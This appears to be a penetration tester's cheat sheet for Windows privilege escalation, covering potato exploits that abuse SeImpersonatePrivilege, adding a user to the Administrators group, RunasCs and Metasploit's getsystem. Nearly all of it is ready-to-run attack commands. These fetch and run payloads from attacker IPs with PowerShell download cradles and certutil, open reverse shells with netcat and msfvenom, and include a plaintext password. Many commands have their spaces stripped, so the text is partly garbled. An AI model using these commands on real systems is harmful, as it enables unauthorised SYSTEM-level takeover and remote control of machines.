Any users with impersonate privileges to NT AUTHORITY\SYSTEM
- User privileges and potato exploit
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer,RoguePotato,SharpEfsPotato,GodPotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. This blog post goes in-depth on the PrintSpoofer tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
>whoami /priv# Find SeImpersonatePrivilege # Use SigmaPoato - Improved God potato # https://github.com/tylerdotrar/SigmaPotato# In memory attack. Find other attacks at github siteKali> rlwrapnc-nlvp1236CMD> powershellPS> [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://10.10.14.16/privesc/SigmaPotato.exe"))
[SigmaPotato]::Main(@("--revshell","10.10.14.16","1236"))# Use God potato to rule them all as of 8/27/2023# https://github.com/BeichenDream/GodPotatoCMD> certutil-urlcache-split-fhttp://10.10.14.16/nc.exeKali> rlwrapnc-nlvp1235CMD> GodPotato-NET4.exe-cmd"nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.16 1235"# Printspoofer# https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ CMD> .\PrintSpoofer64.exe-i-ccmd# Use Local Potato to rule them all - Local Potato or Sweet Potato as pf 12/22/2022# If you do not want to use Local Potato or Sweet Potato:# If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato# If the machine is < Windows 10 1809(or 1803) < Windows Server 2019 and/or only x86- Try Juicy Potato# https://github.com/ivanitlearning/Juicy-Potato-x86 Kali> msfvenom-pwindows/shell_reverse_tcplhost=192.168.45.183lport=443-fexe-oshell.exeCMD> certutil-urlcache-split-fhttp://192.168.45.183/j.exe# Juicy PotatoCMD> certutil-urlcache-split-fhttp://192.168.45.183/shell.exe# reverse shellKali> rlwrapnc-nlvp443CMD> j.exe-l443-pC:\wamp\bin\apache\Apache2.2.21\shell.exe-t*-c{69AD4AEE-51BE-439b-A92C-86AE490E8B30}
Normal User to Local Administrator or More Privileges
- Add Ourselves to the group - Normal Users to Local Administrator
netlocalgroupAdministrators [username] /add
- RunasCS - Local Administrator with having more privileges (as well as logon as a different user)
# Run if you see a user in Local Administrators group# https://github.com/antonioCoco/RunasCs/ # Try if you can add BypassUac and LogonType optionsKali> rlwrapnc-nlvp444PS> IEX (new-Object Net.WebClient).DownloadString('http://10.10.14.35/privesc/Invoke-RunasCs.ps1');Invoke-RunasCs -Username backup -Password 'hjqNspenHcyyAwNqxfJAmFcAtiKThvpotaZpglDs' -BypassUac -LogonType 8 -Command cmd.exe -Remote 10.10.14.35:4444
Local Administrator to System
If you have a Metasploit meterpreter session going, you can run getsystem.
# load the ‘priv’ extensionmeterpreter>useprivLoadingextensionpriv...success.meterpreter># getsystem# local administrator to SYSTEMmeterpreter>getsystem...gotsystem (via technique1).meterpreter>getuidServerusername:NTAUTHORITY\SYSTEMmeterpreter>